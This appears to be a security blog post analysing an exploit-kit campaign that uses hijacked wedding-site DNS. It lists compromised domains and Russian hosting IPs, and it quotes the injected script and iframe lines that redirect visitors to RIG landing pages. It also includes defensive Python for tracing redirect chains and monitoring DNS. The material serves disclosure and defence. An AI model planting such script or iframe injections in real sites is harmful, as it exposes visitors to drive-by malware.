
Specifically, here are some of the wedding websites whose DNS was hijacked for this campaign:

  • amandabrandon.net
  • amberandrew.net
  • angelajacob.com
  • angiecesar.com
  • arnetriawyatt.com
  • ashleyandjames.net
  • caitlinbrad.com
  • carolinaandjeremy.com
  • christineandlucas.com
  • colelauren.com
  • danikastephen.com
  • drgillianmcknight.com
  • forbetterorforgetit.com
  • gillianmcknight.net
  • jazzdish.com
  • jenniferronn.com
  • jessicaandclayton.com
  • jodimichael.net
  • kaitlynsammy.com
  • karimitch.com
  • kassidymichael.com
  • kassiray.com
  • katiejustin.com
  • kristinechris.com
  • sharithenotary.com

All of these websites were created by Rob Cross, a wedding videographer.


This attack campaign started on September 28 and is still ongoing as of the time of posting this blog. It works as follows:

1) A popular website is injected with JavaScript that loads a script from a second site
2) The second site redirects the visitor to the malicious payload destination via an IFRAME
3) The malicious payload destination is served from a Russian IP address, which is where the hijacked DNS entry of a wedding website now points

Hijacking existing DNS entries saves the attacker from registering new domains, and puts the landing page behind a hostname with an established, benign-looking history instead of a freshly registered one.

For example:

 START     www.sidar.org [do not visit]
 REDIRECT  myname.pdhi-online.org
 EK        key.karimitch.com/?xXqKd7Cxxxxxxxxy   (exploit kit landing page)


In this case, sidar.org is the popular website that has been injected with a SCRIPT tag; loading it sends the visitor's browser to the second site:

     <script type="text/javascript" src="http://myname.pdhi-online..>

The redirection to the malicious EK landing page is then done by an IFRAME on the pdhi-online.org site:

     <iframe src="http://key.KARIMITCH.COM/..>

karimitch.com is one of the wedding websites whose DNS has been hijacked, so key.karimitch.com resolves to the attacker's server in Russia rather than to the site's legitimate hosting.
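To make the chain concrete, here is an added Python example (not code from the post or from Cyphort) that pulls off-host script and iframe sources out of a page, follows them hop by hop, and flags any hop whose hostname resolves to one of the Russian IP addresses listed below. The three sample pages, the "/x.js" script path, and the A records for the first two hosts are constructed stand-ins; the fetch and resolve functions are injected so the script runs offline, and in practice you would swap in a real fetcher and resolver.

```python
import re
from urllib.parse import urlparse

# Constructed sample pages modelled on the chain in the post (not captured
# content). The script path "/x.js" is an assumption; the post truncates it.
PAGES = {
    "www.sidar.org": (
        '<html><body><p>site content</p>'
        '<script type="text/javascript" src="http://myname.pdhi-online.org/x.js"></script>'
        '</body></html>'
    ),
    "myname.pdhi-online.org": (
        '<html><body>'
        '<iframe src="http://key.KARIMITCH.COM/?xXqKd7Cxxxxxxxxy" width="1" height="1"></iframe>'
        '</body></html>'
    ),
    "key.karimitch.com": '<html><body><script>/* obfuscated RIG landing */</script></body></html>',
}

# Constructed resolver table. 203.0.113.0/24 is documentation space standing
# in for the legitimate hosts; the last entry is one of the IPs from the post.
A_RECORDS = {
    "www.sidar.org": "203.0.113.10",
    "myname.pdhi-online.org": "203.0.113.20",
    "key.karimitch.com": "109.234.34.247",
}

# IP addresses the post attributes to the RIG landing pages.
EK_HOSTING_IPS = {"109.234.34.247", "193.124.117.105", "5.200.35.126", "212.116.121.122"}

# Matches <script ... src=...> and <iframe ... src=...>. Good enough for
# triage of injected tags; it is not a full HTML parser.
SRC_RE = re.compile(r'<(script|iframe)\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)


def external_srcs(host, html):
    """Return (tag, url) pairs for script/iframe src values that load from another host."""
    found = []
    for tag, url in SRC_RE.findall(html):
        target = urlparse(url).hostname  # lower-cased by urlparse; None for relative URLs
        if target and target != host.lower():
            found.append((tag.lower(), url))
    return found


def trace_chain(start, fetch=PAGES.get, resolve=A_RECORDS.get, max_hops=5):
    """Follow the first off-host script/iframe on each page.

    Returns hops as (how_reached, hostname, resolved_ip). `fetch` and
    `resolve` are injectable so this runs offline against the sample data.
    """
    host = start.lower()
    chain = [("start", host, resolve(host))]
    for _ in range(max_hops):
        html = fetch(host)
        if html is None:
            break
        srcs = external_srcs(host, html)
        if not srcs:
            break
        tag, url = srcs[0]
        host = urlparse(url).hostname
        chain.append((tag, host, resolve(host)))
    return chain


def ek_hops(chain):
    """Hops whose hostname resolves to a known EK hosting IP."""
    return [hop for hop in chain if hop[2] in EK_HOSTING_IPS]


if __name__ == "__main__":
    chain = trace_chain("www.sidar.org")
    for how, host, ip in chain:
        print(f"{how:>7}  {host:<28} -> {ip}")
    for how, host, ip in ek_hops(chain):
        print(f"ALERT: {host} ({how}) resolves to EK hosting IP {ip}")
```

The resolution step is the part worth keeping: a wedding-site hostname showing up in a script or iframe chain looks harmless by name, and only resolving it and comparing the answer against the known hosting IPs (or against what the domain used to resolve to) reveals the hijack.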

The EK landing pages all resolve to IP addresses hosted in Russia:

  • 109.234.34.247  (Moscow, McHost.RU)
  • 193.124.117.105 (Moscow, MTW)
  • 5.200.35.126 (St Petersburg, IT Grad)
  • 212.116.121.122 (St Petersburg, IT Grad)

All of these sites are hosting the RIG exploit kit. RIG has become the most popular exploit kit in the wild since the demise of Angler; see the Cyphort webinar on the rise and fall of Angler.

Here are screenshots of the encrypted and decrypted versions of the RIG scripts.

[Screenshot: RIG exploit script – encrypted]

[Screenshot: RIG exploit script – decrypted]

Over 2 million people are potentially at risk, which is the combined monthly traffic of the sites injected in this campaign. Here is the list of infected sites, with estimated monthly visits per SimilarWeb:

AVOID VISITING THESE WEBSITES

363,000 – www.doentesporfutebol.com.br
327,000 – www.dicasdetreino.com.br
266,000 – www.agilemind.com
260,000 – www.sexchan.info
197,000 – www.fulanax.com
180,000 – www.thehollywoodnews.com
161,000 – www.newshub.org
82,000 – www.xorbin.com
69,000 – www.quran-o-sunnat.com
54,000 – www.turboincomesecret.com
43,000 – www.masterbundles.com
40,000 – www.mubs.ac.ug
39,000 – www.mountainsmith.com
31,000 – www.a2zwebhelp.com
22,000 – www.modeltheme.com
21,000 – www.titanicthemes.com
20,000 – www.1stonlinesolutions.com
12,000 – www.vagtune.in

Over 5,000 weddings take place every day in the United States. According to Quora, a custom wedding website can cost as much as $2,000. It is important to secure your wedding website and its DNS properly (protect the registrar and DNS provider accounts with strong, unique passwords and two-factor authentication, and periodically check that the published records still point where you expect) so that it is not abused by cybercriminals.
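As an added example (not code from the post or from Cyphort), here is a small Python check a site owner can run on a schedule. It compares a domain's current A records against a baseline recorded when the site was known-good, flags any answer that lands on one of the EK hosting IPs named above, and also queries a random label under the domain to detect a wildcard record, since this campaign served the landing page from a subdomain (key.karimitch.com) rather than the site's main hostname. The baseline values are constructed placeholders; replace them with your own records. The resolver is injectable so the logic can be exercised offline; without an injected resolver it uses the system resolver.

```python
import secrets
import socket

# Baseline of expected A records, recorded once while the site is known-good.
# Values here are constructed placeholders (documentation range), not the
# real hosting of these sites.
BASELINE = {
    "karimitch.com": {"203.0.113.5"},
    "www.karimitch.com": {"203.0.113.5"},
}

# IP addresses the post attributes to the RIG landing pages.
EK_HOSTING_IPS = {"109.234.34.247", "193.124.117.105", "5.200.35.126", "212.116.121.122"}


def live_a_records(name):
    """IPv4 addresses from the system resolver (default when nothing is injected)."""
    return {info[4][0] for info in socket.getaddrinfo(name, None, socket.AF_INET)}


def _resolve(resolve, name):
    """Call the resolver, treating NXDOMAIN and other lookup errors as 'no answer'."""
    try:
        return set(resolve(name))
    except OSError:  # socket.gaierror is a subclass of OSError
        return set()


def check_domain(name, expected, resolve=live_a_records):
    """Compare current A records with the baseline and probe for a wildcard record."""
    current = _resolve(resolve, name)
    unexpected = current - set(expected)

    # A label nobody created: an answer here means a wildcard record exists,
    # so any name such as key.<domain> would resolve without an explicit entry.
    probe = f"probe-{secrets.token_hex(4)}.{name}"
    wildcard = _resolve(resolve, probe)

    if unexpected & EK_HOSTING_IPS:
        verdict = "hijacked-known-ek-host"
    elif unexpected:
        verdict = "drifted"
    elif not current:
        verdict = "no-answer"
    else:
        verdict = "ok"
    return {
        "domain": name,
        "current": sorted(current),
        "unexpected": sorted(unexpected),
        "wildcard": sorted(wildcard),
        "verdict": verdict,
    }


def check_all(baseline, resolve=live_a_records):
    """Run check_domain over every baseline entry; returns {domain: result}."""
    return {name: check_domain(name, ips, resolve) for name, ips in baseline.items()}


if __name__ == "__main__":
    for result in check_all(BASELINE).values():
        print(result["verdict"], result)
```

Treat "drifted" as something to confirm with the hosting provider rather than ignore: a legitimate host migration and a hijack look identical in the answer itself, and only the baseline you recorded beforehand tells them apart.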